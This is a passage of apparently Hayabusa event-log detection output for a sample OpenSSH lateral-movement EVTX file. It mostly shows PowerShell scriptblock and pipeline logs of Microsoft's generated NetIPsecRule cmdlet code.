$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.082 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.082 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.092 